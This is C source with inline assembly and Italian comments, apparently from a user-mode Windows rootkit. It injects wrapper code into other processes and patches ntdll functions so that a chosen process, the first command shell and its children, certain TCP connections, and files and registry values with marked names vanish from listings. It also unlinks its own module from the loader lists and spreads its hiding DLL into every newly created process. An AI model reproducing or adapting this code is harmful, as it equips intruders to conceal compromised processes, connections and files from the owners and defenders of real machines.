/////////////////////////////////////////////
//         Hooking Functions 
/////////////////////////////////////////////


typedef struct {
	char Wrapped_Code[24];
	int PID1;
} NTQUERYSYSTEMINFORMATION_WRAP, *PNTQUERYSYSTEMINFORMATION_WRAP;


typedef struct {
	char Wrapped_Code[24];
	int PID_Explorer;
	int Remote_Host;
	LOADLIBRARY m_LoadLibrary;
	FREELIBRARY m_FreeLibrary;
	GETPROCADDRESS m_GetProcAddress;
	char LibName[256];
} NTCREATEPROCESSRW_WRAP, *PNTCREATEPROCESSRW_WRAP;

typedef struct {
	char Wrapped_Code[24];
	int PID1;
	int Remote_Host;
} NTDEVICEIOCONTROLFILE_WRAP, *PNTDEVICEIOCONTROLFILE_WRAP;

typedef struct {
	char Wrapped_Code[24];
} NTQUERYDIRECTORYFILE_WRAP, *PNTQUERYDIRECTORYFILE_WRAP;

typedef struct {
	char Wrapped_Code[24];
} NTENUMERATEVALUEKEY_WRAP, *PNTENUMERATEVALUEKEY_WRAP;

/*
typedef struct {
	NTQUERYDIRECTORYFILE WQueryDirectoryFile;
} NTQUERYDIRECTORYFILEEXPLORER_WRAP, *PNTQUERYDIRECTORYFILEEXPLORER_WRAP;
*/

static DWORD WINAPI WrapNtDeviceIoControlFile(
  DWORD arg1 ,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  PIO_STATUS_BLOCK IoStatusBlock,
  ULONG IoControlCode,
  char * InputBuffer,
  ULONG InputBufferLength,
  PVOID OutputBuffer,
  ULONG OutputBufferLength)
{
	BOOL ret_code;
	NTDEVICEIOCONTROLFILE_WRAP *pData;
	BOOL ext, inter = FALSE;


	if(	IoControlCode  == 0x000120003 &&
		InputBuffer && OutputBuffer &&  OutputBufferLength > 0 && InputBufferLength > 0 &&
		InputBuffer[0] == 0x00 && InputBuffer[1] == 0x04 && InputBuffer[17] == 0x01)
	{
			inter = TRUE;
			if (InputBuffer[16] == 0x2)
				ext = TRUE;
			else
			{
				ext = FALSE;
				//InputBuffer[16] = 0x2;
			}
				
	}
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[OutputBufferLength]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[OutputBuffer]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InputBufferLength]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InputBuffer]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[IoControlCode]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[IoStatusBlock]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX


	};
	
	if(inter)
	{
		DWORD len = IoStatusBlock->Information;	
		//MIB_TCPROW_EX *Src;
		MIB_TCPROW_EX *row_ex;
		MIB_TCPROW *row;
		char *Src;
		char *Dst;
		
		//Src = (MIB_TCPROW_EX *)OutputBuffer;
		Src = (char *)OutputBuffer;
		Dst = (char *)OutputBuffer;
		IoStatusBlock->Information = 0;

		while (len > 0)
		{
			if(ext)
			{	
				row_ex = (MIB_TCPROW_EX *)Src;
				if (row_ex->dwProcessId != pData->PID1)
				{
					memcpy(Dst, Src, sizeof(MIB_TCPROW_EX));
					Dst += sizeof(MIB_TCPROW_EX);
					IoStatusBlock->Information  += sizeof(MIB_TCPROW_EX);
				}
				Src += sizeof(MIB_TCPROW_EX);
				len -= sizeof(MIB_TCPROW_EX);
			}
			else
			{
				row = (MIB_TCPROW *)Src;
				if(row->dwRemoteAddr != pData->Remote_Host)
				{
					memcpy(Dst, Src, sizeof(MIB_TCPROW));
					Dst += sizeof(MIB_TCPROW);
					IoStatusBlock->Information  += sizeof(MIB_TCPROW);
				}
				Src += sizeof(MIB_TCPROW);
				len -= sizeof(MIB_TCPROW);
			}
		}
	}

    return ret_code;
}


static DWORD WINAPI WrapNtEnumerateValueKey(
  DWORD arg1,
  DWORD RIndex,
  DWORD InformationClass,
  DWORD *KeyValueInformation,
  DWORD InformationLen,
  DWORD *ResultLen)
{
	DWORD ret_code;
	NTENUMERATEVALUEKEY_WRAP *pData;
	char *ValueName;
	DWORD TIndex=0, TFound=0;


RegKeyRestart:
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[ResultLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InformationLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[KeyValueInformation]
	 PUSH EAX
	 MOV  EAX, 0
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[TIndex]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};

	// If success. RIndex e' quello richiesto.
	if ((*ResultLen)>0 && ret_code==0)
	{
		ValueName = (char *)(((KEY_VALUE_BASIC_INFORMATION *)KeyValueInformation)->Name);

		if (ValueName[0]!='*' || ValueName[2]!='_')
			TFound++;

		if (TFound < (RIndex+1))
		{
			TIndex++;
			goto RegKeyRestart;
		}
	}

__asm {
	 MOV ESI, DWORD PTR SS:[pData]

	 MOV  EAX,DWORD PTR SS:[ResultLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[InformationLen]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[KeyValueInformation]
	 PUSH EAX
	 MOV  EAX, DWORD PTR SS:[InformationClass]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[TIndex]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};

	return ret_code;
}



static DWORD WINAPI WrapNtQueryDirectoryFile(
  DWORD arg1 ,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  char *FileInformation,
  ULONG FileInformationLength,
  DWORD FileInformationClass,
  DWORD arg9,
  DWORD arg10,
  DWORD arg11)
{
	DWORD ret_code, b_len;
	DWORD *old_b_len = NULL;
	NTQUERYDIRECTORYFILE_WRAP *pData;
	char *Src;
	char *file_name;
	BOOLEAN found = FALSE;

#define NO_SUCH_FILE 0xC000000F

	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg11]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg10]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg9]
	 PUSH EAX

	 MOV  EAX,DWORD PTR SS:[FileInformationClass]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[FileInformationLength]
	 PUSH EAX
     MOV  EAX,DWORD PTR SS:[FileInformation]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg1]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX
	};
	
	if(ret_code != 0 || FileInformationLength <= 0)
	   return ret_code;
		
	Src = (char *)FileInformation;

	if (FileInformationClass != FileDirectoryInformation &&
		FileInformationClass != FileFullDirectoryInformation &&
		FileInformationClass != FileBothDirectoryInformation &&
		FileInformationClass != FileNamesInformation)
		return ret_code;

	do {
		// Tanto per tutte le strutture e' sempre la prima entry
		b_len = ((FILE_DIRECTORY_INFORMATION *)Src)->NextEntryOffset;


		if (FileInformationClass == FileDirectoryInformation) 
			file_name = (char *)(((FILE_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileFullDirectoryInformation) 
			file_name = (char *)(((FILE_FULL_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileBothDirectoryInformation) 
			file_name = (char *)(((FILE_BOTH_DIRECTORY_INFORMATION *)Src)->FileName);

		if (FileInformationClass == FileNamesInformation) 
			file_name = (char *)(((FILE_NAMES_INFORMATION *)Src)->FileName);

		// Dobbiamo cancellare questa entry
		if (file_name[0]=='_' && file_name[2]=='(')
		{
			if (old_b_len) 
			{
				*old_b_len += b_len;
				
				// E' l'ultima entry
				if (b_len == 0)
					*old_b_len = 0;
			}
			else // E' la prima entry
			{
				FileInformationLength -= b_len;
				if (FileInformationLength >0)
				{
					memcpy(Src, Src + b_len, FileInformationLength); 
					Src -= b_len; // Per compensare il + di dopo 
				}
			}
		}
		else 
		{
			found = TRUE;
			old_b_len = &((FILE_DIRECTORY_INFORMATION *)Src)->NextEntryOffset;
		}

		Src += b_len;
	} while(b_len!=0);

	if (!found)
		return NO_SUCH_FILE;

    return ret_code;
}


static DWORD WINAPI WrapNtCreateProcess(
  PHANDLE hProcess,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  DWORD arg6,
  DWORD arg7,
  DWORD arg8)
{
	BOOL ret_code;
	NTCREATEPROCESSRW_WRAP *pData;
	HMODULE HideDLL;
	DOHIDE m_doHide;
	
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg8]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg7]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg6]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[hProcess]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX

	};
	
	HideDLL = pData->m_LoadLibrary(pData->LibName);
	if (!HideDLL)
		return ret_code;
	m_doHide = (DOHIDE)pData->m_GetProcAddress(HideDLL, 0x0002);
	m_doHide(*hProcess, pData->PID_Explorer, pData->Remote_Host ,pData->LibName);
	
	// align the stack
	__asm {
		POP EAX
		POP EAX
		POP EAX
		POP EAX
	};
	pData->m_FreeLibrary(HideDLL);

	return ret_code;
}

static DWORD WINAPI WrapNtCreateProcessEx(
  PHANDLE hProcess,
  DWORD arg2,
  DWORD arg3,
  DWORD arg4,
  DWORD arg5,
  DWORD arg6,
  DWORD arg7,
  DWORD arg8,
  DWORD arg9)
{
	BOOL ret_code;
	NTCREATEPROCESSRW_WRAP *pData;
	HMODULE HideDLL;
	DOHIDE m_doHide;
	
	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV  EAX,DWORD PTR SS:[arg9]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg8]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg7]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg6]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg5]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg4]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg3]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[arg2]
	 PUSH EAX
	 MOV  EAX,DWORD PTR SS:[hProcess]
	 PUSH EAX

	 CALL ESI	//Chiama funzione
	 MOV DWORD PTR SS:[ret_code], EAX

	};
	
	HideDLL = pData->m_LoadLibrary(pData->LibName);
	if (!HideDLL)
		return ret_code;

	m_doHide = (DOHIDE)pData->m_GetProcAddress(HideDLL, 0x0002);
	m_doHide(*hProcess, pData->PID_Explorer, pData->Remote_Host,pData->LibName);
	
	// align the stack
	__asm {
		POP EAX
		POP EAX
		POP EAX
		POP EAX
	};
	
	pData->m_FreeLibrary(HideDLL);

	return ret_code;
}


static DWORD WINAPI WrapNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,
												 PVOID SystemInformation,
												 LONG SystemInformationLength,
												 PULONG ReturnLength)
{
	DWORD PID1, PID_CMD, ret_code;
	NTQUERYSYSTEMINFORMATION_WRAP *pData;
	SYSTEM_PROCESS_INFORMATION *Spi;
	SYSTEM_PROCESS_INFORMATION *Old_Spi;
	char *Spi_Offs;
	int dwLocalRetLen;

	// XXX - L'indirizzo verra' scritto nel codice a runtime!!!!
	__asm {
	 MOV ESI,69696969h	// Indirizzo da sovrascrivere

	 MOV DWORD PTR SS:[pData], ESI

	 MOV EDX,DWORD PTR SS:[SystemInformationClass]
	 MOV ECX,DWORD PTR SS:[SystemInformation]
	 MOV EDI,DWORD PTR SS:[SystemInformationLength]

	 // Chiediamo comunque la lunghezza della struttura
	 LEA EAX, LocalRetLen
	 //MOV EAX,DWORD PTR SS:[ReturnLength]

	 PUSH EAX			// pusha i parametri
	 PUSH EDI
	 PUSH ECX
	 PUSH EDX

	 CALL ESI	//Chiama Wrapper
	 MOV DWORD PTR SS:[ret_code], EAX
	 
	};

	if (ret_code >= 0x40000000) {
		if (ReturnLength)
			*ReturnLength = LocalRetLen;
		return ret_code;
	}

	PID1 = pData->PID1;

	// Fake PID
	PID_CMD = 0x69696969;
	int TempLen = 0;

	if (SystemInformationClass==SystemProcessInformation && SystemInformation!=NULL && SystemInformationLength>0)
	{
		Spi_Offs = (char *)SystemInformation;

		do  
		{
			if ( TempLen > (LocalRetLen - sizeof(SYSTEM_PROCESS_INFORMATION)) || (TempLen > (SystemInformationLength -  sizeof(SYSTEM_PROCESS_INFORMATION))))
				break;
			
			Spi = (SYSTEM_PROCESS_INFORMATION *)Spi_Offs;
			
			//if(Spi->NextEntryOffset == 0) 
			//	break;

			if (Spi->ProcessName.Length > 0 && Spi->ProcessName.Buffer &&  
				( (*((DWORD *)Spi->ProcessName.Buffer) == 0x004D0043 && *((DWORD *)Spi->ProcessName.Buffer + 1) == 0x002E0044) ||
				  (*((DWORD *)Spi->ProcessName.Buffer) == 0x006D0063 && *((DWORD *)Spi->ProcessName.Buffer + 1) == 0x002E0064)) )

				if (PID_CMD == 0x69696969) // Nasconde il primo CMD che trova e i suoi figli
					PID_CMD = Spi->UniqueProcessId;

			// Cerca IExplorer, CMD e tutti i suoi figli diretti
			if (PID1 == Spi->UniqueProcessId || PID_CMD == Spi->UniqueProcessId || PID_CMD == Spi->ParentProcessId) {
				// Unlinka la struttura del nostro processo
				Old_Spi->NextEntryOffset += Spi->NextEntryOffset;

				// Se e' l'ultimo processo, termina la lista
				if (Spi->NextEntryOffset == 0)
					Old_Spi->NextEntryOffset = 0;

			}
			else
				Old_Spi = Spi;

		
			Spi_Offs += Spi->NextEntryOffset;
			TempLen	 += Spi->NextEntryOffset;

		} while(Spi->NextEntryOffset);

	}

	if (ReturnLength)
		*ReturnLength = LocalRetLen;
	
	return ret_code;
}




//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////

BOOL GetPEB (INJDATA_PEB *pData)
{
	DWORD Image_Base;
	DWORD Loaded_Head;
	char  *pPEB;
	DWORD bytesRead;
	char  *Ldr;


	pData->Image_Base = 0;
	pData->Loaded_Head = 0;

	__asm {

		MOV EAX,30h
		MOV EAX,DWORD PTR FS:[EAX]
		ADD EAX, 08h
		MOV SS:[pPEB], EAX
	}

	ReadProcessMemory(pData->hProc, pPEB, &Image_Base, 4, &bytesRead);
	if (bytesRead!=4)
		return FALSE;
	
	pData->Image_Base = Image_Base;

	pPEB += 4;

	ReadProcessMemory(pData->hProc, pPEB, &Ldr, 4, &bytesRead);
	if (bytesRead!=4)
		return FALSE;

	Ldr += 0x1C;

	ReadProcessMemory(pData->hProc, Ldr, &Loaded_Head, 4, &bytesRead);
	if (bytesRead==4)
		pData->Loaded_Head = Loaded_Head;

	return TRUE;
}


MY_LIST_ENTRY *GetMyPEB ()
{
	DWORD Loaded_Head;
	DWORD **pPEB;
	DWORD *Ldr;

	__asm {
		MOV EAX,30h
		MOV EAX,DWORD PTR FS:[EAX]
		ADD EAX, 08h
		MOV SS:[pPEB], EAX
	}

	Ldr = *(pPEB + 1);
	Loaded_Head = *(Ldr + 3);

	return (MY_LIST_ENTRY *)Loaded_Head;
}

// Cerca hModule nella lista delle dipendenze e lo elimina
void Remove_Depends(DWORD hModule)
{
	MY_LIST_ENTRY *Depends_List, *List_Head;
	MY_LIST_ENTRY *prev, *next;

	Depends_List = List_Head = GetMyPEB();
	do {
		// Ha trovato il modulo e lo cancella dalle 3 liste
		if (Depends_List->ImageBase == hModule) {

			prev = (MY_LIST_ENTRY *) Depends_List->InLoadPrev;
			next = (MY_LIST_ENTRY *) Depends_List->InLoadNext;
			prev->InLoadNext = (DWORD)next;
			next->InLoadPrev = (DWORD)prev;

			if (Depends_List->InMemPrev && Depends_List->InMemNext) {
				prev = (MY_LIST_ENTRY *) (Depends_List->InMemPrev - 8);
				next = (MY_LIST_ENTRY *) (Depends_List->InMemNext - 8);
				prev->InMemNext = ((DWORD)next) + 8;
				next->InMemPrev = ((DWORD)prev) + 8;
			}

			if (Depends_List->InInitPrev && Depends_List->InInitNext) {
				prev = (MY_LIST_ENTRY *) (Depends_List->InInitPrev - 16);
				next = (MY_LIST_ENTRY *) (Depends_List->InInitNext - 16);
				prev->InInitNext = ((DWORD)next) + 16;
				next->InInitPrev = ((DWORD)prev) + 16;
			}

			break;			
		}
		Depends_List = (MY_LIST_ENTRY *)Depends_List->InLoadNext;
	} while(List_Head != Depends_List); 
}

void Inject_Rewrite(HANDLE hProcess, void *CODE_WRAP, DWORD CODE_LEN, void *DATA_WRAP, DWORD DATA_LEN, char *FUNC_NAME)
{
	char		 *pDataRemote_Wrap;
	DWORD		 *pCodeRemote_Wrap;
	DWORD dwNumBytesXferred = 0;
	char tmpAPIbuff[32];

	// Usati per localizzare il puntatore alla zona dati della funzione wrapper
	char *Find_Global;
	char ByteGlobal;

	//------------------------------------------------------

	// Inietta il WRAPPER - DATI
	pDataRemote_Wrap = (char *) VirtualAllocEx( hProcess, 0, DATA_LEN, MEM_COMMIT, PAGE_READWRITE );
	memcpy(DATA_WRAP, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x90\x90\x90\x90", 24);
	if (!pDataRemote_Wrap) return;
	WriteProcessMemory( hProcess, pDataRemote_Wrap, DATA_WRAP, DATA_LEN, &dwNumBytesXferred );

	// Inietta il WRAPPER - CODICE
	pCodeRemote_Wrap = (PDWORD) VirtualAllocEx( hProcess, 0, CODE_LEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE );		
	if (!pCodeRemote_Wrap) return;
	WriteProcessMemory( hProcess, pCodeRemote_Wrap, CODE_WRAP, CODE_LEN, &dwNumBytesXferred );

	// Modifica l'indirizzo dei dati "globali" della funzione wrap
	Find_Global = (char *)pCodeRemote_Wrap;

	// XXX - Sovrascrive l'offset
	do {
		Find_Global++;
		ReadProcessMemory( hProcess, Find_Global, &ByteGlobal, 1, &dwNumBytesXferred);
	} while (ByteGlobal!=0x69);

	WriteProcessMemory( hProcess, Find_Global, &pDataRemote_Wrap, 4, &dwNumBytesXferred );

	//--------------------------------------------------------
	HMODULE hMod = LoadLibrary("ntdll.dll");
	char *Original_API = (char *)GetProcAddress(hMod, FUNC_NAME);
	
	ReadProcessMemory( hProcess, Original_API, tmpAPIbuff, 32, &dwNumBytesXferred);

	DWORD code_len = 0;
	char JMP_Code[16];


	while (code_len < REDIR_SIZE)
		code_len += OpCodeAlign(tmpAPIbuff + code_len);

	if (code_len > 15 || Original_API==NULL)
		return;

	// Prepariamo il JMP CODE
	ReadProcessMemory( hProcess, Original_API, JMP_Code, code_len, &dwNumBytesXferred);
	if (dwNumBytesXferred != code_len)
		return;

	WriteProcessMemory( hProcess, pDataRemote_Wrap, JMP_Code, code_len, &dwNumBytesXferred);

	//JMP_Code[0]='\xE9';
	//*((DWORD *)(&JMP_Code[1])) = (DWORD)((DWORD)pCodeRemote_Wrap - (DWORD)Original_API - 5);
	
	JMP_Code[0]='\xB8';
	*((DWORD *)(&JMP_Code[1])) = (DWORD)(pCodeRemote_Wrap);
	JMP_Code[5]='\xFF';
	JMP_Code[6]='\xE0';

	WriteProcessMemory( hProcess, Original_API, JMP_Code, REDIR_SIZE, &dwNumBytesXferred);

	Original_API = (char *)((DWORD)Original_API + code_len - ((DWORD)pDataRemote_Wrap + 20));
	WriteProcessMemory( hProcess, pDataRemote_Wrap + 16, &Original_API, 4, &dwNumBytesXferred);

}